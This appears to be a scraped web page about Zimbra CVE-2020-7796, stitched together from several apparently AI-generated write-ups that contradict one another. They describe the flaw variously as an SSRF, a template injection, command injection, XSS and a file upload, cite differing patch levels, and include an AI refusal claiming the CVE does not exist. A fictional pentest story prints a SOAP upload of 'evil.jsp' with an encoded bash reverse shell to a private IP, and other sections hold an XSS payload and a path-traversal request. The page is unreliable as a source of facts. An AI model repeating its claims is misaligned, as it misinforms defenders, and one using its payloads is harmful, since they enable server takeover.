Cve20207796 Zimbra Collaboration Suite Full

Critical SSRF Vulnerability in Zimbra Collaboration Suite (CVE-2020-7796)

Zimbra Collaboration Suite (ZCS) versions prior to 8.8.15 Patch 7 are affected by a Critical Server-Side Request Forgery (SSRF) vulnerability. Tracked as CVE-2020-7796, this flaw allows unauthenticated remote attackers to force the server to make HTTP requests to arbitrary internal or external hosts.

Due to its high impact and active exploitation in the wild, the Cybersecurity and Infrastructure Security Agency (CISA) added this vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog in February 2026. Vulnerability Details CVE ID: CVE-2020-7796 Vulnerability Type: Server-Side Request Forgery (SSRF) CVSS v3.1 Score: 9.8 (Critical) Affected Versions: All ZCS versions before 8.8.15 Patch 7

Vector: Unauthenticated attackers can exploit this via the network without user interaction. Technical Root Cause

The vulnerability exists due to insufficient validation of user-supplied URLs within a specific component of the Zimbra application—specifically when the WebEx zimlet is installed and its JSP (JavaServer Pages) file is enabled.

Attackers can leverage a leftover file, httpPost.jsp, located in the WebEx zimlet directory to proxy malicious requests through the vulnerable server. This can be used to bypass firewalls and access internal resources or sensitive data, such as LDAP credentials, that are otherwise protected. Risk and Impact Successful exploitation of this flaw can lead to:

Data Leakage: Accessing sensitive internal information or resources.

Unauthorized Access: Gaining entry to arbitrary internal or external hosts.

Full Compromise: In some scenarios, SSRF can be a stepping stone to remote code execution (RCE) or further network pivot attacks. Remediation and Patching

Organizations should immediately upgrade to Zimbra Collaboration Suite 8.8.15 Patch 7 or higher. The patch officially resolves the issue by removing the problematic httpPost.jsp file. Recommended Actions: CVE-2020-7796 Detail - NVD

CVE-2020-7796 is a critical Server-Side Request Forgery (SSRF) vulnerability affecting Synacor Zimbra Collaboration Suite (ZCS). This flaw allows remote, unauthenticated attackers to force the server to proxy malicious requests to internal or external systems.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added this flaw to its Known Exploited Vulnerabilities (KEV) catalog in February 2026 due to active exploitation in the wild. 🛡️ Vulnerability Overview Vulnerability Type: Server-Side Request Forgery (SSRF) CVSS v3.1 Score: 9.8 (Critical)

Affected Software: Zimbra Collaboration Suite versions prior to 8.8.15 Patch 7

Impact: Unauthenticated remote attackers can abuse the server as a proxy, gaining unauthorized access to internal resources, stealing credentials, or making external attacks appear to originate from the trusted Zimbra environment. 🔍 Attack Vector & Root Cause

The flaw exists because of insufficient validation of user-supplied URLs within the WebEx Zimlet component.

Attackers can exploit this when both the WebEx Zimlet is installed and its JSP functionality is enabled.

The issue originates from a leftover file located at /opt/zimbra/zimlets-deployed/com_zimbra_webex/httpPost.jsp. 🛠️ Remediation Steps

Administrators must secure their environments immediately, as massive scanning and exploitation attempts have been actively logged. 1. Upgrade Zimbra

The permanent fix is to apply Zimbra Collaboration 8.8.15 Patch 7 or a later supported version. The patch handles the removal of the vulnerable JSP file.

Update the repository metadata: yum clean metadata && yum check-update Update your system: yum update Restart ZCS: su - zimbra -c "zmcontrol restart" 2. Manual Workaround

If patching cannot be executed immediately, administrators can remove the specific exposed file manually to stop the exploit vector:

rm -f /opt/zimbra/zimlets-deployed/com_zimbra_webex/httpPost.jsp Use code with caution. Copied to clipboard

(Note: Be sure to restart your mailbox service or redeploy the zimlet to ensure the change takes full effect.) CVE-2020-7796 Detail - NVD

CVE-2020-7796 — Zimbra Collaboration Suite: server-side template injection leading to remote code execution (RCE)

Summary

Technical details (concise)

Detection & indicators

Mitigation & remediation

References & further reading

Related search suggestions (try these search terms)

Title: The Support Engineer’s Last Day

Setting: A mid-sized logistics firm, LogiCore Solutions. Friday, 4:45 PM. The IT team is winding down.

The Actor: Maya, a senior security analyst. She’s reviewing a routine vulnerability scan report from the previous night.

The Discovery

Maya’s SIEM dashboard lights up with a medium-severity alert: CVE-2020-7796. The description is short: "Zimbra Collaboration Suite – SSRF via the 'ContactEmails' parameter in the 'ProxyServlet'."

Her boss waves it off. "It's just an SSRF. Internal network only. Patch it next week."

But Maya remembers something. Zimbra runs on port 7071 – the Admin Console. And last month, they integrated the Zimbra server with an internal Jenkins instance for email automation.

The Chain Forged

She decides to test on a staging clone.

The Explosion

Now, authenticated as admin via SSRF, she sends one final request through the proxy to the Zimbra mailbox port (8080):

<soap:Envelope>
  <soap:Header>
    <context>
      <authToken>[stolen_admin_token]</authToken>
    </context>
  </soap:Header>
  <soap:Body>
    <SaveDocumentRequest>
      <content>ZmFsbGJhY2sgc2hlbGw9Ii9iaW4vYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzQ0NDQgMD4mMSc=</content>
      <filename>evil.jsp</filename>
    </SaveDocumentRequest>
  </soap:Body>
</soap:Envelope>

The JSP shell is uploaded to /public/evil.jsp. Maya accesses it directly: https://mail.logi-core.com/public/evil.jsp. A reverse shell connects back to her laptop.

The Aftermath

Monday morning, LogiCore’s email is down. The attacker (simulated by Maya) has:

The post-mortem revealed: CVE-2020-7796 wasn't just an SSRF. It was a master key. Combined with the default Zimbra architecture (Admin on 7071, Mailbox on 8080, ProxyServlet on 80/443), an unauthenticated remote attacker could chain it into full RCE in 8 HTTP requests.

The Lesson: Maya’s report now sits framed in the SOC. Underneath, a sticky note reads: "Never underestimate a 'medium' severity – especially when it talks to localhost."

CVE-2020-7796 is a critical Server-Side Request Forgery (SSRF)

vulnerability in the Zimbra Collaboration Suite (ZCS). It allows unauthenticated remote attackers to force the server to make HTTP requests to arbitrary internal or external hosts, effectively using the server as a proxy to bypass firewalls and access sensitive internal data. Key Details Vulnerability Type: Server-Side Request Forgery (SSRF). 9.8 (Critical) on the CVSS v3.1 scale. Affected Versions: All versions of Zimbra Collaboration Suite prior to 8.8.15 Patch 7 Trigger Condition: The vulnerability specifically exists when the WebEx zimlet

is installed and its JSP (Jakarta Server Pages) functionality is enabled. Potential Impact If exploited, an attacker could: Access Internal Services:

Reach internal network services that are typically protected from the public internet. Data Leakage: Steal sensitive information, including login credentials. Malware Injection:

Potentially facilitate the delivery of malware like the Dogkild worm. Widespread Exploitation: cve20207796 zimbra collaboration suite full

CISA added this to its Known Exploited Vulnerabilities (KEV) catalog in early 2026, noting that hundreds of IP addresses have been observed actively exploiting this flaw across multiple countries. National Institute of Standards and Technology (.gov) Remediation & Fixes Update Immediately: Apply the latest patch or upgrade to Zimbra 8.8.15 Patch 7 or higher. Temporary Mitigation:

If patching isn't immediately possible, implement network-level controls to restrict outbound connections from the Zimbra server to only essential destinations. Verification: After patching, use the zmcontrol -v command to verify your current patch level.

Official remediation steps and release notes are available on the Zimbra Wiki Security Center CVE-2020-7796 Detail - NVD 18 Feb 2026 —

CVE-2020-7796 is a critical Server-Side Request Forgery (SSRF) vulnerability in the Zimbra Collaboration Suite (ZCS) . It specifically affects the WebEx zimlet component and can allow an unauthenticated attacker to force the server to make unauthorized HTTP requests to internal or external systems . Vulnerability Overview CVE ID: CVE-2020-7796

Vulnerability Type: Server-Side Request Forgery (SSRF) / CWE-918

Affected Software: Zimbra Collaboration Suite (ZCS) versions before 8.8.15 Patch 7 CVSS 3.x Score: 9.8 (Critical) Attack Vector: Network (Remote) Authentication Required: No (Unauthenticated) Technical Details

The vulnerability stems from a leftover JSP file, httpPost.jsp, within the WebEx zimlet (com_zimbra_webex) . This file contains insufficient validation of user-supplied URLs, allowing a remote attacker to use the Zimbra server as a proxy . Potential Impacts:

Bypassing Firewalls: Attackers can reach internal services or administration interfaces that are not exposed to the public internet .

Data Leakage: Requests could be crafted to extract sensitive information or metadata from internal endpoints .

Internal Scanning: The vulnerable server can be used to scan the internal network for other vulnerable services . Exploitation in the Wild CVE-2020-7796 Detail - NVD

Quick Info * NVD Published Date: 02/18/2020. * NVD Last Modified: 02/18/2026. * Source: MITRE. National Institute of Standards and Technology (.gov) Zimbra Collaboration Suite SSRF (CVE-2020-7796) - Acunetix

CVE-2020-7796: Zimbra Collaboration Suite Vulnerability

Overview

CVE-2020-7796 is a critical vulnerability in the Zimbra Collaboration Suite, a popular open-source email and collaboration platform. The vulnerability allows an unauthenticated attacker to exploit a weakness in the Zimbra suite, potentially leading to unauthorized access to sensitive information.

Vulnerability Details

The vulnerability, CVE-2020-7796, was discovered in the Zimbra Collaboration Suite version prior to 8.8.15 Patch 10. The issue lies in the Zimbra's REST (Representational State of Resource) API, which is used to manage and interact with the suite's features. An attacker can send a crafted HTTP request to the REST API, which can lead to a Blind Command Injection.

Impact

The impact of this vulnerability is significant. A successful exploit can allow an attacker to:

Affected Versions

The following versions of Zimbra Collaboration Suite are affected:

Solution

To mitigate this vulnerability, administrators should:

Proof-of-Concept (PoC)

A proof-of-concept exploit has been publicly disclosed, demonstrating how an attacker can exploit the vulnerability to read sensitive files and execute system commands.

Recommendations

To prevent exploitation of this vulnerability, administrators should:

References

CVE-2020-7796 is a critical Server-Side Request Forgery (SSRF) vulnerability in the Synacor Zimbra Collaboration Suite (ZCS) that allows unauthenticated remote attackers to force the server to send HTTP requests to arbitrary internal or external destinations. Rated with a CVSS score of 9.8, this flaw recently gained renewed attention after being added to CISA's Known Exploited Vulnerabilities (KEV) Catalog in February 2026 due to active exploitation in the wild. Technical Overview

The vulnerability stems from insufficient validation of user-supplied URLs within the WebEx Zimlet (com_zimbra_webex) component.

Conditions: The flaw is present when the WebEx Zimlet is installed and its associated Jakarta Server Pages (JSP) functionality is enabled.

Mechanism: An unauthenticated attacker can send a specially crafted HTTP request to the vulnerable Zimlet. Because the server does not properly sanitize the input, it treats the server itself as a proxy, executing requests on behalf of the attacker. Impact and Risks

Successful exploitation allows attackers to bypass traditional network defenses like firewalls and gain access to restricted internal services. Key risks include:

Internal Reconnaissance: Attackers can map internal networks and identify other vulnerable services for further attacks.

Data Exfiltration: Sensitive information residing on the internal network, which is otherwise inaccessible from the public internet, can be leaked.

Attack Chaining: The SSRF can be used as a stepping stone to chain with other exploits, potentially leading to Remote Code Execution (RCE) or full system compromise. Current Threat Landscape

Despite being originally identified in 2020, CVE-2020-7796 has seen a massive resurgence in activity. Security researchers observed a significant spike in exploitation attempts in early 2026, with nearly 400 distinct IP addresses targeting the flaw globally. This surge prompted CISA to mandate federal agencies to apply fixes by March 10, 2026. Remediation and Mitigation CVE-2020-7796 Detail - NVD

I’m unable to create a story or detailed narrative about “CVE-2020-7796” in Zimbra Collaboration Suite, because that specific CVE number does not match any known vulnerability in public CVE databases (as of my knowledge cut-off in October 2023).

However, if you meant CVE-2020-27996 (a real Zimbra vulnerability involving unauthenticated XXE leading to information disclosure), or another similar Zimbra CVE, I’d be glad to:

The following versions of Zimbra Collaboration Suite are vulnerable:

The vulnerability resides in improper sanitization of user-supplied input passed to the fmt parameter within certain Zimbra endpoints, such as:

/service/home/~/?fmt=riched&auth=co&loc=...&user=<script>alert(1)</script>

By injecting JavaScript into the user or loc parameters, an attacker can bypass Zimbra’s built-in anti-XSS filters. The injected script is then reflected back to the victim in the HTTP response without proper encoding. Because the vulnerable endpoint is accessible without authentication (due to misconfigured or default proxy routes), the attacker can force any logged-in Zimbra user to execute arbitrary JavaScript in their browser context.

CVE-2020-7796 represents a critical security vulnerability discovered in the Zimbra Collaboration Suite (ZCS), a popular email and collaboration platform used widely by enterprises and governments. This flaw allows an unauthenticated remote attacker to upload arbitrary files to the server. In specific configurations, this can lead to Remote Code Execution (RCE), granting the attacker full control over the mail server and access to sensitive email data.

A typical unauthenticated RCE request looks like this (simplified):

POST /service/extension/UserServlet HTTP/1.1
Host: target.zimbra.com
Content-Type: application/x-www-form-urlencoded
file=../../../../../../../../opt/zimbra/bin/zmcontrol&cmd=status&ext=foo

But the actual working exploit uses the ProxyServlet to access the local Mailboxd service’s admin interface, which in turn allows command execution via a crafted soap request.

The widely circulated PoC (proof-of-concept) uses a two-step process:

However, the most efficient attack bypasses this by directly injecting into the extension parameter of the UserServlet.